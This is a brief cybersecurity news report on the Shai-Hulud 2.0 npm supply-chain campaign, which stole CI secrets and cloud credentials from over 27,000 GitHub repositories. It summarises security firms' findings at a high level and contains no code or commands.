More than 27,000 npm repositories on GitHub, including widely used packages from ENS Domains, PostHog, Zapier, and Postman, have been impacted by the second wave of Shai-Hulud malware attacks, reports The Hacker News.Intrusions involved the inclusion of a new preinstall script in the package.json file that enabled covert Bun runtime installation or location, as well as illicit script execution, before the registration of the compromised machine as the "SHA1HULUD" self-hosted runner and pilfering all GitHub Actions secrets, according to a Wiz report.Another analysis from Helixguard noted that SHA1HULUD then executes TruffleHog to facilitate the theft of npm tokens, and Azure, Google Cloud, and AWS credentials, as well as environment variables. Such a campaign was regarded by Koi Security and Palo Alto Networks Unit 42 researchers to be significantly more aggressive than the initial Shai-Hulud attacks in September."If Shai-Hulud 2.0 fails to exfiltrate credentials, it executes a fail-safe that attempts to irrevocably destroy the victim's entire home directory, escalating the attack from simple espionage into a guaranteed, highly disruptive denial-of-service event," said Unit 42's Justin Moore.
Supply chain, DevOps
New Shai-Hulud supply chain campaign exposes over 27K GitHub repositories

(Adobe Stock)
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds



